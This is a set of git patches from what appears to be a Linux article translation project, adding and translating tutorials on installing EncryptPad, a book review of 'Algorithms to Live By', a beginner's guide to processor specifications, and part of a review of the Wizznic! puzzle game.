diff --git a/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
index ad3528f60b..1b4ed51305 100644
--- a/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
+++ b/sources/tech/20171212 Toplip – A Very Strong File Encryption And Decryption CLI Utility.md
@@ -1,3 +1,5 @@
+Translating by singledo
+
Toplip – A Very Strong File Encryption And Decryption CLI Utility
======
There are numerous file encryption tools available on the market to protect
diff --git a/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md b/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
deleted file mode 100644
index f5a42780b5..0000000000
--- a/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md
+++ /dev/null
@@ -1,123 +0,0 @@
-translateing by singledo
-
-How to Install and Use Encryptpad on Ubuntu 16.04
-======
-
-EncryptPad is a free and open source software application that can be used for viewing and editing encrypted text using a simple and convenient graphical and command line interface. It uses OpenPGP RFC 4880 file format. You can easily encrypt and decrypt file using EncryptPad. Using EncryptPad, you can save your private information like, password, credit card information and access the file using a password or key files.
-
-#### Features
-
- * Supports Windows, Linux and Mac OS
- * Customisable passphrase generator helps create strong random passphrases.
- * Random key file and password generator.
- * Supports GPG and EPD file formats.
- * You can download key automatically from remote storage using CURL.
- * Path to a key file can be stored in an encrypted file. If enabled, you do not need to specify the key file every time you open files.
- * Provide read only mode to prevent file modification.
- * Encrypt binary files such as, images, videos, archives.
-
-
-
-In this tutorial, we will learn how to install and use the software EncryptPad on Ubuntu 16.04.
-
-### Requirements
-
- * Ubuntu 16.04 desktop version installed on your system.
- * A normal user with sudo privileges setup on your system.
-
-
-
-### Install EncryptPad
-
-By default, EncryptPad is not available in Ubuntu 16.04 default repository. So you will need to install an additional repository for EncryptPad first. You can add it with the following command:
-
-sudo apt-add-repository ppa:nilarimogard/webupd8
-
-Next, update the repository using the following command:
-
-sudo apt-get update -y
-
-Finally, install EncryptPad by running the following command:
-
-sudo apt-get install encryptpad encryptcli -y
-
-Once the installation is completed, you should locate it under Ubuntu dashboard.
-
-### Access EncryptPad and Generate Key and Passphrase
-
-Now, go to the **Ubuntu Dash** and type **encryptpad** , you should see the following screen:
-
-[![Ubuntu Desktop][1]][2]
-
-Next, click on the **EncryptPad** icon, you should see the first screen of the EncryptPad in following screen. It is a simple text editor and has a menu bar on the top.
-
-[![EncryptPad][3]][4]
-
-First, you will need to generate a key and passphrase for future encryption/decryption tasks. To do so, click on **Encryption > Generate Key** option from the top menu, you should see the following screen:
-
-[![Generate Key][5]][6]
-
-Here, select the path where you want to save the file and click on the **Ok** button, you should see the following screen:
-
-[![Passphrase for key file][7]][8]
-
-Now, enter passphrase for the key file and click on the **Ok** button, you should see the following screen:
-
-[![Use generated key for this file][9]][10]
-
-Now, click on the yes button to finish the process.
-
-### Encrypt and Decrypt File
-
-Now, the key file and passphrase are generated, it's time to perform encryption and decryption operation. To do so, open any text file in this editor and click on the **encryption** icon, you should see the following screen:
-
-[![Encrypt or Decrypt file][11]][12]
-
-Here, provide input file which you want to encrypt and specify the output file, provide passphrase and the path of the key file which we have generated earlier, then click on the Start button to start the process. Once the file has been encrypted successfully, you should see the following screen:
-
-[![File encrypted successfully][13]][14]
-
-Your file is now encrypted with key and passphrase.
-
-If you want to decrypt this file, open **EncryptPad** , click on **File Encryption** , choose **Decryptio** option, provide the path of your encrypted file and path of the output file where you want to save the decrypted file, then provide path of the key file and click on the Start button, it will ask you for passphrase, enter your passphrase and click on Ok button to start the Decryption process. Once the process is completed successfully, you should see the "File has been decrypted successfully message".
-
-[![File encryption settings][15]][16]
-
-[![Passphrase][17]][18]
-
-[![File has been encrypted][19]][20]
-
-**Note:** If you forgot your passphrase or lost a key file, there is no way that can be done to open your encrypted information. There are no backdoors in the formats that EncryptPad supports.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/tutorial/how-to-install-and-use-encryptpad-on-ubuntu-1604/
-
-作者:[Hitesh Jethva][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dash.png
-[2]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dash.png
-[3]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dashboard.png
-[4]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dashboard.png
-[5]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-key.png
-[6]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-key.png
-[7]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-passphrase.png
-[8]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-passphrase.png
-[9]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-use-key-file.png
-[10]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-use-key-file.png
-[11]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-start-encryption.png
-[12]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-start-encryption.png
-[13]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-file-encrypted-successfully.png
-[14]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-file-encrypted-successfully.png
-[15]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-page.png
-[16]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-page.png
-[17]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-passphrase.png
-[18]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-passphrase.png
-[19]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-successfully.png
-[20]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-successfully.png
diff --git a/translated/tech/How to install and use encryptpad on ubuntu 16.04.md b/translated/tech/How to install and use encryptpad on ubuntu 16.04.md
new file mode 100644
index 0000000000..83e8f78645
--- /dev/null
+++ b/translated/tech/How to install and use encryptpad on ubuntu 16.04.md
@@ -0,0 +1,108 @@
+# How To Install and Use Encryptpad on Ubuntu 16.04
+
+EncryptPad 是一款自由开源的软件,它可以通过简单方便的图形界面和命令行接口来查看和编辑加密文本,使用的是 OpenPGP RFC 4880 文件格式。借助 EncryptPad,你可以很容易地加密或解密文件,用它保存密码、信用卡信息这类私人信息,并通过口令或密钥文件来访问。
+## 特性
+- 支持 Windows、Linux 和 Mac OS。
+- 可定制的口令生成器,可以生成健壮的随机口令。
+- 随机密钥文件和口令生成器。
+- 支持 GPG 和 EPD 文件格式。
+- 可以通过 CURL 自动从远程仓库下载密钥。
+- 密钥文件的路径可以存储在加密文件中。如果启用该功能,你就不需要每次打开文件时都指定密钥文件。
+- 提供只读模式,防止文件被修改。
+- 可以加密二进制文件,例如图片、视频、归档文件等。
+
+在本教程中,我们将学习如何在 Ubuntu 16.04 中安装和使用 EncryptPad。
+## 环境要求
+- 系统上安装有 Ubuntu 16.04 桌面版。
+- 一个在系统上拥有 sudo 权限的普通用户。
+
+## 安装 EncryptPad
+默认情况下,Ubuntu 16.04 的官方仓库中没有 EncryptPad。你需要先添加一个额外的仓库,可以通过下面的命令来添加:
+
+`sudo apt-add-repository ppa:nilarimogard/webupd8`
+
+接下来,用下面的命令更新仓库:
+
+`sudo apt-get update -y`
+
+最后,通过下面的命令安装 EncryptPad:
+
+`sudo apt-get install encryptpad encryptcli -y`
+
+安装完成后,你就可以在 Ubuntu 的 Dash 中找到它了。
+
+## 使用 EncryptPad 生成密钥和密码
+
+现在,在 Ubuntu Dash 中输入 encryptpad,你会在屏幕上看到如下画面:
+
+[![Ubuntu DeskTop][1]][2]
+
+接下来,点击 EncryptPad 图标,你会看到 EncryptPad 的主界面——一个简单的文本编辑器,顶部带有菜单栏。
+
+[![EncryptPad screen][3]][4]
+
+首先,你需要生成一个密钥文件和口令,供以后的加密/解密任务使用。点击顶部菜单中的 **Encryption > Generate Key**,你会看到如下界面:
+
+[![Generate key][5]][6]
+
+选择密钥文件保存的路径,点击 **OK** 按钮,你将看到如下界面:
+
+[![select path][7]][8]
+
+输入密钥文件的口令,点击 **OK** 按钮,你将看到如下界面:
+
+[![last step][9]][10]
+
+点击 **Yes** 按钮完成这一过程。
+## 加密和解密文件
+
+现在,密钥文件和口令都已经生成,可以执行加密和解密操作了。在这个文本编辑器中打开一个文本文件,点击**加密**图标,你会看到如下界面:
+
+[![Encry operation][11]][12]
+
+在这里指定需要加密的输入文件和输出文件,提供口令以及前面生成的密钥文件的路径,然后点击 **Start** 按钮开始加密。文件加密成功后,会出现如下界面:
+
+[![Success Encrypt][13]][14]
+
+你的文件现在已经用密钥和口令加密好了。
+
+如果你想解密已加密的文件,打开 EncryptPad,点击 **File Encryption**,选择 **Decryption** 操作,指定加密文件的路径和解密后输出文件的路径,再提供密钥文件的路径,然后点击 **Start** 按钮,系统会要求输入口令,输入你先前加密时使用的口令,点击 **OK** 按钮开始解密。过程成功完成后,你会看到 “File has been decrypted successfully” 的消息。
+
+[![File encryption settings][15]][16]
+
+[![Passphrase][17]][18]
+
+[![File has been decrypted][19]][20]
+
+
+**注意:** 如果你忘记了口令或者丢失了密钥文件,就再也没有办法打开你加密的信息了。EncryptPad 所支持的格式没有任何后门。
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/how-to-install-and-use-encryptpad-on-ubuntu-1604/
+
+作者:[Hitesh Jethva][a]
+译者:[singledo](https://github.com/singledo)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dash.png
+[2]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dash.png
+[3]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dashboard.png
+[4]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dashboard.png
+[5]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-key.png
+[6]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-key.png
+[7]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-passphrase.png
+[8]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-passphrase.png
+[9]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-use-key-file.png
+[10]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-use-key-file.png
+[11]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-start-encryption.png
+[12]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-start-encryption.png
+[13]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-file-encrypted-successfully.png
+[14]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-file-encrypted-successfully.png
+[15]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-page.png
+[16]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-page.png
+[17]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-passphrase.png
+[18]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-passphrase.png
+[19]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-successfully.png
+[20]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-successfully.png
\ No newline at end of file
From aa5579732272ecf925c94c27cada42dc22ef57f8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:47:12 +0800
Subject: [PATCH 034/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Review:=20Algorit?=
=?UTF-8?q?hms=20to=20Live=20By=20by=20Brian=20Christian=20&=20Tom=20Griff?=
=?UTF-8?q?iths?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...e By by Brian Christian - Tom Griffiths.md | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
diff --git a/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md b/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
new file mode 100644
index 0000000000..edd1844f71
--- /dev/null
+++ b/sources/tech/20171022 Review- Algorithms to Live By by Brian Christian - Tom Griffiths.md
@@ -0,0 +1,44 @@
+Review: Algorithms to Live By
+======
+![](https://www.eyrie.org/~eagle/reviews/covers/1-62779-037-3.jpg)
+
+Another read for the work book club. This was my favorite to date, apart from the books I recommended myself.
+
+One of the foundations of computer science as a field of study is research into algorithms: how do we solve problems efficiently using computer programs? This is a largely mathematical field, but it's often less about ideal or theoretical solutions and more about making the most efficient use of limited resources and arriving at an adequate, if not perfect, answer. Many of these problems are either day-to-day human problems or are closely related to them; after all, the purpose of computer science is to solve practical problems with computers. The question asked by Algorithms to Live By is "can we reverse this?": can we learn lessons from computer science's approach to problems that would help us make day-to-day decisions?
+
+There's a lot of interesting material in the eleven chapters of this book, but there's also an amusing theme: humans are already very good at this. Many chapters start with an examination of algorithms and mathematical analysis of problems, dive into a discussion of how we can use those results to make better decisions, then talk about studies of the decisions humans actually make... and discover that humans are already applying ad hoc versions of the best algorithms we've come up with, given the constraints of typical life situations. It tends to undermine the stated goal of the book. Thankfully, it in no way undermines interesting discussion of general classes of problems, how computer science has tackled them, and what we've learned about the mathematical and technical shapes of those problems. There's a bit less self-help utility here than I think the authors had intended, but lots of food for thought.
+
+(That said, it's worth considering whether this congruence is less because humans are already good at this and more because our algorithms are designed from human intuition. Maybe our best algorithms just reflect human thinking. In some cases we've checked our solutions against mathematical ideals, but in other cases they're still just our best guesses to date.)
+
+This is the sort of a book where a chapter listing is an important part of the review. The areas of algorithms discussed here are optimal stopping, explore/exploit decisions (when to go with the best thing you've found and when to look for something better), sorting, caching, scheduling, Bayes's rule (and prediction in general), overfitting when building models, relaxation (solving an easier problem than your actual problem), randomized algorithms, a collection of networking algorithms, and finally game theory. Each of these has useful insights and thought-provoking discussion of how these sometimes-theoretical concepts map surprisingly well onto daily problems. The book concludes with a discussion of "computational kindness": an encouragement to reduce the required computation and complexity penalty for both yourself and the people you interact with.
+
+If you have a computer science background (as I do), many of these will be familiar concepts, and you might be dubious that a popularization would tell you much that's new. Give this book a shot, though; the analogies are less stretched than you might fear, and the authors are both careful and smart about how they apply these principles. This book passes with flying colors a key sanity check: the chapters on topics that I know well or have thought about a lot make few or no obvious errors and say useful and important things. For example, the scheduling chapter, which unsurprisingly is about time management, surpasses more than half of the time management literature by jumping straight to the heart of most time management problems: if you're going to do everything on a list, it rarely matters the order in which you do it, so the hardest scheduling problems are about deciding what not to do rather than deciding order.
+
+The point in the book where the authors won my heart completely was in the chapter on Bayes's rule. Much of the chapter is about Bayesian priors, and how one's knowledge of past events is a vital part of analysis of future probabilities. The authors then discuss the (in)famous marshmallow experiment, in which children are given one marshmallow and told that if they refrain from eating it until the researcher returns, they'll get two marshmallows. Refraining from eating the marshmallow (delayed gratification, in the psychological literature) was found to be associated with better life outcomes years down the road. This experiment has been used and abused for years for all sorts of propaganda about how trading immediate pleasure for future gains leads to a successful life, and how failure in life is because of inability to delay gratification. More evil analyses have (of course) tied that capability to ethnicity, with predictably racist results.
+
+I have [kind of a thing][1] about the marshmallow experiment. It's a topic that reliably sends me off into angry rants.
+
+Algorithms to Live By is the only book I have ever read to mention the marshmallow experiment and then apply the analysis that I find far more convincing. This is not a test of innate capability in the children; it's a test of their Bayesian priors. When does it make perfect sense to eat the marshmallow immediately instead of waiting for a reward? When their past experience tells them that adults are unreliable, can't be trusted, disappear for unpredictable lengths of time, and lie. And, even better, the authors supported this analysis with both a follow-up study I hadn't heard of before and with the observation that some children would wait for some time and then "give in." This makes perfect sense if they were subconsciously using a Bayesian model with poor priors.
+
+This is a great book. It may try a bit too hard in places (applicability of the math of optimal stopping to everyday life is more contingent and strained than I think the authors want to admit), and some of this will be familiar if you've studied algorithms. But the writing is clear, succinct, and very well-edited. No part of the book outlives its welcome; the discussion moves right along. If you find yourself going "I know all this already," you'll still probably encounter a new concept or neat explanation in a few more pages. And sometimes the authors make connections that never would have occurred to me but feel right in retrospect, such as relating exponential backoff in networking protocols to choosing punishments in the criminal justice system. Or the realization that our modern communication world is not constantly connected, it's constantly buffered, and many of us are suffering from the characteristic signs of buffer bloat.
+
+I don't think you have to be a CS major, or know much about math, to read this book. There are a lot of mathematical details in the end notes if you want to dive in, but the main text is almost always readable and clear, at least so far as I could tell (as someone who was a CS major and has taken a lot of math, so a grain of salt may be indicated). And it still has a lot to offer even if you've studied algorithms for years.
+
+The more I read of this book, the more I liked it. Definitely recommended if you like reading this sort of analysis of life.
+
+Rating: 9 out of 10
+
+Reviewed: 2017-10-22
+
+--------------------------------------------------------------------------------
+
+via: https://www.eyrie.org/~eagle/reviews/books/1-62779-037-3.html
+
+作者:[Brian Christian;Tom Griffiths][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.eyrie.org
+[1]:https://www.eyrie.org/~eagle/reviews/books/1-59184-679-X.html
From a5e4f44bc85ccc32ab13d86bc00deeef9bd82e1e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:50:50 +0800
Subject: [PATCH 035/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Processors=20-=20?=
=?UTF-8?q?Everything=20You=20Need=20to=20Know?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rocessors - Everything You Need to Know.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20171023 Processors - Everything You Need to Know.md
diff --git a/sources/tech/20171023 Processors - Everything You Need to Know.md b/sources/tech/20171023 Processors - Everything You Need to Know.md
new file mode 100644
index 0000000000..e3ee2e5998
--- /dev/null
+++ b/sources/tech/20171023 Processors - Everything You Need to Know.md
@@ -0,0 +1,112 @@
+Processors - Everything You Need to Know
+======
+![](http://www.theitstuff.com/wp-content/uploads/2017/10/processors-all-you-need-to-know.jpg)
+
+Our digital devices like Phones, Computers and laptops have grown to become so sophisticated, that they are no longer just devices, they have evolved to become a part of us.
+
+They perform many tasks with the help of apps and software. But have we ever stopped to wonder what powers this software? How does it perform its logic? Where is its brain?
+
+We already know that a CPU or **Processor** is the brain of any device that must process data or perform logical tasks.
+
+[![intel processors][1]][1]
+
+But what are the different **concepts behind Processors**? How are they evaluated? How are some processors faster than others? And many more such questions. So let's have a look at some major terms involved with processors and see how they affect processing speed.
+
+### **Architecture**
+
+Processors come in different architectures. You must have come across different types of programs that say they are for 64-bit or 32-bit systems. What this means is that those programs support that particular processor architecture.
+
+If a processor has a 32 Bit Architecture it means that it can process 32 Bits of information in one processing cycle.
+
+Similarly, a 64 Bit processor will process 64 Bits in one cycle.
+
+The amount of RAM you can use also depends on the architecture: the maximum addressable memory is 2 raised to the power of the system's architecture width, in bytes.
+
+For a processor with a 16-bit architecture, only 64 KB of RAM is accessible. For a 32-bit processor, the maximum usable RAM is 4 GB, and for a 64-bit processor it is 16 exabytes.
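+
+As a quick sanity check, these limits follow directly from 2 raised to the address width in bits; the short shell snippet below is just an illustrative sketch that reproduces them:
+
+```
+# Addressable memory = 2^(address width in bits) bytes
+echo "16-bit: $((2**16)) bytes (64 KB)"
+echo "32-bit: $((2**32)) bytes (4 GB)"
+# 2^64 overflows bash's 64-bit signed arithmetic, so compute the last one with bc
+echo "64-bit: $(echo '2^64' | bc) bytes (16 EB)"
+```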
+
+### **Cores**
+
+Cores are basically processing units in the computer. They receive instructions and act on it. The more Cores you have, the better your processing speed.
+
+Imagine it like workers in a factory, The more workers you have the faster you will be able to do work.
+
+But more workers demand more salary, and the factory gets a little crowded. Similarly, having more cores will definitely boost processing, but more cores need more power, and they also heat the CPU a little more than fewer cores would.
+
+### **Clocking Speed**
+
+We often hear that a processor is of 1 GHz or 2 GHz or 3 GHz. So what are these GHz?
+
+[![cpu speed][2]][2]
+
+GHz is short for GigaHertz. Giga means 'Billion' and Hertz means 'one cycle per second'. So a processor of 2 GHz can perform 2 Billion cycles in one second.
+
+This is also known as 'frequency' or 'Clocking Speed' of your processor. The higher the number the better it is for your CPU.
+
+### **CPU Cache**
+
+CPU cache is a small memory unit inside the processor that stores frequently used data. Whenever a task has to be performed, data needs to pass from the RAM to the CPU. Since the CPU works a lot faster than the RAM, the CPU would otherwise sit idle most of the time, waiting for data from the RAM. To solve this, the RAM keeps sending data to the CPU cache continuously.
+
+You usually get 2-3 MB of CPU cache in most mid-range processors, and up to 6 MB in high-end ones. The more cache your processor has, the better it is.
+
+### **Lithography**
+
+The lithography of a processor refers to the size of the transistors used. It is usually measured in nanometers, and the smaller it is, the more compact your processor will be. This allows more cores to fit into the same slot and reduces power consumption.
+
+The latest Intel processors have a lithography of 14 nm.
+
+### **Thermal Design Power (TDP)**
+
+It represents the average power, in watts, the processor dissipates when operating at Base Frequency with all cores active under an Intel-defined, high-complexity workload.
+
+So the lower it is, the better for you. A lower TDP not only means lower power consumption, it also means less heat is generated.
+
+[![battery cpu][3]][3]
+
+Desktop processors usually consume more energy and have a TDP above 40 watts, whereas their mobile counterparts consume up to three times less energy.
+
+### **Memory Support(RAM)**
+
+I already mentioned how processor architecture affects the amount of RAM we can use, but that only holds true in theory. In practice, the maximum amount of RAM a given processor supports is usually listed in its spec sheet.
+
+[![RAM][4]][4]
+
+The spec sheet also mentions the DDR version of the memory supported.
+
+### **Overclocking**
+
+So I already spoke about clocking speed. Now overclocking is the process of forcing your CPU to perform more cycles.
+
+Gamers usually overclock their processors to get more juice out of their CPU. This surely increases speed but it also increases power consumption and heat generation.
+
+A lot of high-end processors allow overclocking. But if we wish to overclock an unsupported processor, we have to manually flash a new BIOS onto the motherboard to do it.
+
+This may get the job done, but it is neither safe nor recommended.
+
+### **Hyper-Threading**
+
+When adding more physical cores was not a convenient way to meet a particular processing need, Hyper-Threading was invented to create virtual cores.
+
+So when we say that a dual-core processor has Hyper-Threading, it has 2 physical cores and 2 virtual cores. So it is technically a Quad-core processor in the body of a dual-core one.
+
+### **Conclusion**
+
+A processor has many variables associated with it. And it is the most important part of any digital device. So it is very important that before selecting a device we carefully examine the specifications of its processor keeping all the above variables in mind.
+
+Variables like Clock-Speed, Cores, CPU cache and architecture should be maximum. While it is better that variables like TDP and lithography stay as low as possible.
+
+Still confused about something? Feel free to comment and I will try to reply asap.
+
+
+--------------------------------------------------------------------------------
+
+via: http://www.theitstuff.com/processors-everything-need-know
+
+作者:[Rishabh Kandari][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.theitstuff.com/author/reevkandari
+[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/download.jpg
+[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/download-1.jpg
+[3]:http://www.theitstuff.com/wp-content/uploads/2017/10/download-2.jpg
+[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/images.jpg
From 5e1bad6da06bbf7cbb2ad4a42a2bced18fb73b82 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 08:52:42 +0800
Subject: [PATCH 036/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Highly=20Addictiv?=
=?UTF-8?q?e=20Open=20Source=20Puzzle=20Game?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ighly Addictive Open Source Puzzle Game.md | 106 ++++++++++++++++++
1 file changed, 106 insertions(+)
create mode 100644 sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
diff --git a/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md b/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
new file mode 100644
index 0000000000..9a662c835c
--- /dev/null
+++ b/sources/tech/20171024 Highly Addictive Open Source Puzzle Game.md
@@ -0,0 +1,106 @@
+Highly Addictive Open Source Puzzle Game
+======
+![](https://i0.wp.com/www.ossblog.org/wp-content/uploads/2017/10/Wizznic-Level4.png?resize=640%2C400&ssl=1)
+
+### About Wizznic!
+
+This is an open source game inspired by the classic Puzznic, a tile-matching puzzle arcade game developed and produced by Taito in 1989. The game is way more than a clone of Puzznic. But like Puzznic, it's a frighteningly addictive game. If you like puzzle games, Wizznic! is definitely a recommended download.
+
+The premise of the game is quite simple, but many of the levels are fiendishly difficult. The objective of each level is to make all the bricks vanish. The bricks disappear when they touch others of the same kind. The bricks are heavy, so you can only push them sideways, but not lift them up. The level has to be cleared of bricks before the time runs out, or you lose a life. With all but the first game pack, you only have 3 lives.
+
+### Installation
+
+I've mostly played Wizznic! on a Beelink S1 mini PC running a vanilla Ubuntu 17.10 installation. The mini PC only has on-board graphics, but this game doesn't require any fancy graphics card. I needed to install three SDL libraries before the game's binary would start. Many Linux users will already have these libraries installed on their PC, but they are trivial to install.
+
+`sudo apt install libsdl-dev`
+`sudo apt-get install libsdl-image1.2`
+`sudo apt-get install libsdl-mixer1.2`
+
+The full source code is available on GitHub under an open source license, so you can compile it yourself if you really want to. The Windows binary works 'out of the box'.
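+
+If you do want to build it yourself, the process is the usual clone-and-make routine; the repository URL, directory name, and binary name below are only placeholders in an illustrative sketch, so check the project's README for the exact steps:
+
+```
+# Clone the repository (placeholder URL; use the one linked from wizznic.org)
+git clone https://github.com/example/wizznic.git
+cd wizznic
+# Build against the SDL 1.2 libraries installed above
+make
+# Run the freshly built binary from the source tree (binary name may differ)
+./wizznic
+```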
+
+### Wizznic! in action
+
+To give a flavour of Wizznic! in action, here's a short YouTube video of the game. Apologies for the poor quality sound; this is my first video made with the Beelink S1 mini PC (see footnote).
+
+### Screenshots
+
+#### Level 4 from the Wizznic! 1 Official Pack
+
+![Wizznic! Level4][1]
+
+The puzzles in the first pack offer a gentle introduction to the game.
+
+#### Game Editor
+
+![Wizznic! Editor][2]
+
+The game sports its own puzzle creator. With the game editor, it's simple to make your own puzzles and share them with your friends, colleagues, and the rest of the world.
+
+Features of the game include:
+
+ * Atmospheric music - composed by SeanHawk
+ * 2 game modes: Career, Arcade
+ * Many hours of mind-bending puzzles to master
+ * Create your own graphics (background images, tile sets, fonts), sound, levels, and packs
+ * Built-in game editor - create your own puzzles
+ * Play your own music
+ * High Score table for each level
+ * Skip puzzles after two failed attempts to solve them
+ * Game can be controlled with the mouse, no keyboard needed
+ * Level packs:
+ * Wizznic! 1 - Official Pack with 20 levels, 5 lives. A fairly gentle introduction
+ * Wizznic! 2 - Official Pack with 20 levels
+ * Wizznic Silver - Proof of concept with 8 levels
+ * Nes levels - NES Puzznic with 31 levels
+ * Puzznic! S.4 - Stage 4 from Puzznic with 10 levels
+ * Puzznic! S.8 - Stage 8 from Puzznic with 10 levels
+ * Puzznic! S.9 - Stage 9 from Puzznic with 10 levels
+ * Puzznic! S.10 - Stage 10 from Puzznic with 9 levels
